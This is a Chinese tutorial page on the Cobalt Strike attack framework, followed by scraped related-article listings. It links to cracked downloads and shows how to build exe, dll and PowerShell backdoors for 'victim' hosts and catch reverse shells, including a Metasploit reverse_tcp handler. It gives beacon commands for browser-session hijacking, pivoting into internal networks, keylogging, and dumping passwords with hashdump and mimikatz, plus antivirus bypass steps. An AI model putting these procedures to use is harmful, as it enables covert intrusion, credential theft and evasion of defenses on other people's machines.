0x00  Cobalt Strike简介

      Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的平台使用,当然可以结合Armitage进行使用。

0x01 Cobalt Strike搭建和使用

1.下载Cobalt Strike破解版本

   Cobalt Strike  3.6

            https://pan.baidu.com/share/init?surl=bprqv75   密码3rtq

   Cobalt Strike  3.8

            https://pan.baidu.com/share/init?surl=pL7gSOz   密码b1dn

2.在团体服务器上执行命令,以运行服务器端:

./teamserver  10.0.0.88  backlion  //服务器IP地址为10.0.0.88,密码为backlion

3.在客服端上执行(可多人连接):

windows上:

直接双击打开 cobaltstrike.jar

linux上:

./cobaltstrike  

主机名:10.0.0.88  端口:50050 用户名:任意  密码:backlion

4.创建本地监听listen:

Cobalt Strike->Listeners ,然后点击Add便可以创建自己想要的Listeners了,Cobalt Strike3.6包括

其中 windows/beacon* 是Cobalt Strike自带的模块,包括dns,http,https,smb四种方式的监听器, windows/foreign* 为外部监听器,即msf或者Armitage的监听器。 选择监听器以后,host会自动填写我们开启服务时的ip,配置监听端口,然后保存,监听器就创建好

5.攻击模块介绍

创建好监听器,下面就需要配置客户端了,Cobalt Strike包括多种攻击方式,其中Packages包括如下几种:

HTML Application 生成恶意的HTA木马文件;

MS Office Macro 生成office宏病毒文件;

Payload  Generator 生成各种语言版本的payload;

USB/CD AutoPlay 生成利用自动播放运行的木马文件;

Windows  Dropper 捆绑器,能够对文档类进行捆绑;

Windows  Executable 生成可执行exe木马;

Windows  Executable(S) 生成无状态的可执行exe木马。

Web Drive-by(钓鱼攻击)包括如下几个模块:

Manage  对开启的web服务进行管理;

Clone Site 克隆网站,可以记录受害者提交的数据;

Host File 提供一个文件下载,可以修改Mime信息;

PowerShell Web Delivery 类似于msf 的web_delivery ;

Signed Applet Attack 使用java自签名的程序进行钓鱼攻击;

Smart Applet Attack 自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本;

System Profiler 用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等。

Spear  Phish 是用来邮件钓鱼的模块。

6.view显示模块介绍

View模块可以方便测试者查看各个模块,图形化的界面可以方便的看到受害者机器的各个信息。

Applications 显示受害者机器的应用信息;

Credentials  显示受害者机器的凭证信息,能更方便的进行后续渗透;

Downloads 文件下载;

Event Log 可以看到事件日志,清楚的看到系统的事件,并且团队可以在这里聊天;

Keystrokes 查看键盘记录;

Proxy Pivots 查看代理信息;

Screenshots 查看屏幕截图;

Script Console 在这里可以加载各种脚本以增强功能,脚本地址 戳我 ;

Targets 查看目标;

Web Log 查看web日志。

7.reporting生成报告模块介绍

activity report 活动报告生成

Hosts report 主机报告

Indicators  opromisef com  目标报告

Sessions report 会话报告

Social  engineering report 社会工程学报告

Export data  数据出口

8.Beacon模块使用

8.1 生成一个exe的后门程序

attacks——packages--windows executable,可生成一个windows的exe后门,如下图所示:

8.2将生成的后门artifact.exe上传到受害者主机上执行

在Cobalt Strike中就会反弹出目标受害者主机的shell,然后点击受害者的机中的interact

8.3点击受害者反弹的主机中的interact,然后就可以进入到beacon中

图九

8.4 beacon模块之shell命令

beacon> help shell

beacon>shell ifconfig

beacon>shell whoami

beacon>shell net user

8.5 beacon模块之browserpivot命令

用户注入受害者浏览器进程,然后开启HTTP代理,之后就可以登录受害者登录的网站了

beacon>ps     //查看浏览器进程,这里进程为2396

图十

beacon>browserpivot  2396    //注入进程,并开启http代理,代理服务器为:   10.0.0.88:62243

图十

本地浏览器设置http代理,host: 10.0.0.88 代理类型为:http  端口为:62243

beacon>browserpivot   stop    //停止代理

图十

8.6 beacon模块之 Socks命令

选择受害者主机,然后右键Pivoting->SOCKS Server,则使用此台计算机开启socks代理

图十

图十

图十六

在kali下 配置proxychains的配置文件:

vim  /etc/proxychains.conf'

将socks4   127.0.0.1    9050 改为:  socks4      127.0.0.1     26370

proxychains  firefox ESR   //可通过sokcsk5代理访问肉鸡内网

beacon>socks stop  //关闭scoks代理

8.7 beacon模块之Screenshot&Keylogger

beacon>screenshot    //运行屏幕截屏命令

然后打开View->Screenshots,则可以看到屏幕截图

图十

beacon>ps          //查看系统进程,随便选择一个程序的进程PID  

beacon> keylogger 2640  //键盘记录注入进程

打开View->Keystrokes,则可以看到键盘记录结果

图十

8.8 beacon模块之powershell-import命令(渗透win2008以及以上)

beacon> powershell-import   //导入各种powershell脚本,这里可以导入nishang模块

beacon>powershell  posershell脚本名

或者

beacon> powershell Check-VM

8.9 Cobalt Strike与msf的联动

1.在MSF下执行以下命令:

msf > use exploit/multi/handler

msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.100

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

2.在Cobalt Strik中执行,先添加一个监听命令,名称为:msf  payload选择:windows/foreign/reverse_tcp  监听端口:4444

图十九

3.选择受害者主机,然后右击Spawn

图二

4.在msf下即可反弹出meterpreter会话:

图二十一

8.10 beacon模块之密码读取*

beacon> sleep 0  //快速显示结果

beacon> wdigest //读取信息

beacon>hashdump   //读取账号hash密码值,需要administer权限,右击受害者主机--access-hashdump

beacon> logonpasswords  //运行mimikatz, 右击受害者主机--access- RUN mimikatz

9.过杀软bybass测试

1.生成一个dll劫持的后门,可反弹shell过杀软。

图二十

图二十

attackes---windows executable(s)--http Beacon--windows dll(64),生成一个dll文件

2.在受害者主机上执行:regsvr32  beacon.dll

3.也可以生成一个powershell的ps文件,也可以bybass  杀软

图二十四

二十五

这里也可以生成一个powershell的ps文件,也可以bybass  360杀软

attackes---windows executable(s)--http Beacon--posershell

4. 在受害者主机上执行:posershell  beacon.ps1

0x03 Cobalt Strike小结

Cobalt Strike功能异常强大,并且是MSF的图形化界面,操作更直观,能更加方便的进行自动化攻击,对渗透测试中的你有所帮助

目录

0x00  Cobalt Strike简介

0x01 Cobalt Strike搭建和使用

1.下载Cobalt Strike破解版本

2.在团体服务器上执行命令,以运行服务器端:

3.在客服端上执行(可多人连接):

4.创建本地监听listen:

5.攻击模块介绍

6.view显示模块介绍

7.reporting生成报告模块介绍

8.Beacon模块使用

8.1 生成一个exe的后门程序

8.2将生成的后门artifact.exe上传到受害者主机上执行

8.3点击受害者反弹的主机中的interact,然后就可以进入到beacon中

8.4 beacon模块之shell命令**

8.5 beacon模块之browserpivot命令

8.7 beacon模块之Screenshot&Keylogger

8.8 beacon模块之powershell-import命令(渗透win2008以及以上)

8.9 Cobalt Strike与msf的联动

8.10 beacon模块之密码读取*

9.过杀软bybass测试

0x03 Cobalt Strike小结


Cobalt Strike的使用的更多相关文章

  1. Cobalt Strike 服务器搭建及使用

    Cobalt Strike使用中的一些坑(一) http://www.cnblogs.com/miaodaren/articles/7829793.html cobaltstrike3.8服务器搭建及 ...

  2. Cobalt Strike DNS通讯实例

    一.域名设置 如果没有域名,可以参考另一篇博客,申请Freenom免费域名,并使用DNSPod解析 链接:https://www.cnblogs.com/ssooking/p/6364639.html ...

  3. [工具]Cobalt Strike 3.13 TeamServer for Windows

    Cobalt Strike 3.13 TeamServer for Windows 0x001 环境 CS 3.12 或 3.13 Kali或Win最好安装jdk1.8.5或之后版本 设置环境变量,如 ...

  4. Cobalt Strike 学习

    前言 本文以一个模拟的域环境为例对 Cobalt Strike 的使用实践一波. 环境拓扑图如下: 攻击者(kali) 位于 192.168.245.0/24 网段,域环境位于 192.168.31. ...

  5. Cobalt Strike深入使用

    System Profiler使用 System Profiler 模块,搜集目标的各类机器信息(操作系统版本,浏览器版本等) Attacks->web drive-by->System ...

  6. Cobalt Strike 3.13的新功能

    Cobalt Strike 3.13现已推出.此版本添加了TCP Beacong,进程参数欺骗,并将Obfuscate和Sleep功能扩展到SMB和TCP Beacons. TCP Beacon Co ...

  7. (转载)Cobalt Strike tutorial下针对CVE-2017-0199利用

    CVE-2017-0199利用OLE对象嵌入Word / RTF文档的方式,使得可以在没有用户交互的情况下执行其内容.OLE由许多不同的程序支持,OLE通常用于使在另一个程序中可用的程序中创建的内容. ...

  8. Cobalt strike 第二节生成报告

    0x00前言: 上一节我们说了怎么连接到服务器 0x01生成报告: 首先打开Cobalt Strike 点击Cobalt Strike -> Preferences Preferences Pe ...

  9. cobalt strike 第一节连接到团队的服务器

    介绍:Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透工具,集成了端口转发.服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,jav ...

  10. 后渗透神器Cobalt Strike的安装

    0x01 简介 Cobalt Strike集成了端口转发.扫描多模式端口监听Windows exe木马,生成Windows dll(动态链接库)木马,生成java木马,生成office宏病毒,生成木马 ...

随机推荐

  1. AppiumForMac安装2

    安装了两天的Python和Appium,各种不成功,到现在还不知道要怎么才能使用,两者之间的关联性还是没找到. 虽然很乱,还是把这期间用到的知识汇总下: 1.爬墙很重要,下载东西慢的很. 2.最新的M ...

  2. yum 搭建私有仓库

    今日内容 Linux 中安装软件的三种方法 yum 私有仓库 selinux 和 firewalld (iprables) 解决系统乱码 内容详细 一.Linux 安装软件的三种方法 rpm安装.yu ...

  3. c++ 移动与拷贝

    c++ 移动与拷贝

  4. Session、Session共享、Token演变

    巨人的肩膀 深夜,我偷听到程序员要对session下手-- (qq.com)

  5. Linux 下 Git版本升级

    一.下载需要安装的版本号 wget https://mirrors.edge.kernel.org/pub/software/scm/git/git-2.24.0.tar.gz 二.安装需求 yum ...

  6. ensp上防火墙的实现

    使用ensp模拟器中的防火墙(USG6000V)配置NAT(网页版)一.NAT介绍NAT(Network Address Translation,网络地址转换):简单来说就是将内部私有地址转换成公网地 ...

  7. java jdbc连接池

    public class C3P0Util { //1. 在成员变量位置创建一个静态的ComboPooledDtatSource 对象 private static ComboPooledDataSo ...

  8. 爬虫之爬取豆瓣top250电影排行榜及爬取斗图啦表情包解读及爬虫知识点补充

    今日内容概要 如何将爬取的数据直接导入Excel表格 #如何通过Python代码操作Excel表格 #前戏 import requests import time from openpyxl impo ...

  9. Python——序列与字符串

    序列与字符串 一. 列表 列表是Python的内置可变序列,是包含若干元素的有序连续内存空间.同一列表元素的数据类型可以各不相同,可以分别为整数.实数.字符串等基本类型,也可以是列表.元组.字典.集合 ...

  10. Linux下配置远程免密登录

    第一步: 输入ssh-keygen: [root@localhost zookeeper-3.5.7]# ssh-keygen Generating public/private rsa key pa ...